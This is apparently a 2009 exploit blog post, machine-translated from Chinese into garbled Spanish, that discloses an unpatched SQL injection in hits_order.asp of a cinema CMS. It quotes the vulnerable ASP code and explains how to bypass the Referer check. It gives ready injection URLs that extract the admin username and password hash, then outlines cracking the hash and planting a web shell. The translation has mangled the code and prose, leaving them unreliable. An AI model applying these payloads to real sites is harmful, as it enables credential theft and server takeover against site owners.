Eye-día del sistema de cine-0 días 0 días, hits_order.asp, la inyección, el ojo-día del sistema de cine,-st0p blog

Día Eye-0 días de cine del sistema

Esta entrada fue publicada el 25 de octubre 2009

: St0p y My5t3ry
Reproducido, por favor indique la fuente de http://www.st0p.org

Ah, y My5t3ry subir con el agujero, póngase en contacto con el administrador oficial, ha habido atención a mí.

En primer lugar, me inyectan el problema

La laguna archivo / p_inc / hits_order.asp

  <! - # Include file = ".. / P_inc / config.asp" ->
 <! - # Include file = ".. / P_inc / function.asp" ->
 <! - # Include file = ".. / P_inc / function_func.asp" ->
 <! - # Include file = ".. / P_inc / openconn.asp" ->
 <! - # Include file = ".. / P_inc / G_function.asp" ->
 <%
 Then Si no es ChkPost () Luego
	 G_error_page_1 respuesta. Redirigir G_error_page_1
	 ( ) Fin respuesta ()
 Fin SI
 "Llama a la ChkPost / p_inc / function.asp archivo () para detectar la dirección URL de origen
 url,numb ) G_hitss de función (URL, numb)
	 Dim str
	 str = ""
	 & numb & " id,m_name,m_pic,m_hits,m_content from qingtiandy_movie where m_look=1 order by m_hits desc,id desc" sql = "SELECT TOP" & insensible y "id, m_name, m_pic, m_hits, m_content de qingtiandy_movie donde m_look = 1 order by m_hits desc, id desc"
             "Vi que no adormecida, sin filtro
	 server . CreateObject ( G_RS ) Set rs = servidor. CreateObject (G_RS)
	 , 1 rs. abierto sql, conn, 1, 1
	 i = 1
	 ¿Es el bien no rs. Eof 
		 Array ( "d" ,rs ( 0 ) ,url ) ) d_url = url_ (Array ("d", rs (0), url))
		 "<div class=kkk1_list><a class=bbb href=" & d_url & " title='主演：" & rs ( 2 ) & "'>" & Get_length ( rs ( 1 ) , "" , 32 ) & "</a> (" & rs ( 3 ) & ")</div>" str = el STR y "el <div class=kkk1_list> <a href=" class=bbb y d_url &" title='主演:" y RS (2) y "'>" y Get_length (rs (1), "", 32) & "</ a> (" & rs (3) & ") </ div>
		 i = i + 1
		 rs. MoveNext
	 Bucle
	 G_hitss = str
 End Function
 %>
 G_hitss ( request ( "url" ) , request ( "numb" ) ) %> ") document.write ("<% = G_hitss solicitud ((" url "), la solicitud (" Numb "))%>")
 "Aquí filtro de entumecimiento

El uso de métodos tales como
1, se puede utilizar directamente el Referer de software falsificado, visite la siguiente dirección para lograr
A través de XMLHTTP forjó el Referer, visite la siguiente dirección de la ejecución
3, de JS JavaScript para controlar la dirección URL de origen

  ( "<a href='/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,'>科幻片</a> " ) ; javascript:. el documento de la escritura (<a href='/p_inc/hits_order.asp?numb=1 str_username (select de tbl_admin) como username,(select str_pass de tbl_admin) pass,'> como la ciencia ficción </ a> ") ;

http://www.st0p.org/p_inc/hits_order.asp?numb=1 (str_username selección de tbl_admin) como nombre de usuario, (str_pass selección de tbl_admin) como paso,

Nota: para saltar sobre el Referer la detección puede ser a través de la POST, GET, la cookie de una variedad de maneras de lograr inyectado. . .

El acceso a la siguiente, el nombre de usuario administrador en la dirección URL del enlace, el hash de la contraseña aparece directamente. .

Resuelve el hash de la contraseña porque el fondo se puede editar directamente el archivo ASP, en el fondo y tomar la línea SHELL.

Este procedimiento, hay otras lagunas. Aquí no se hace. .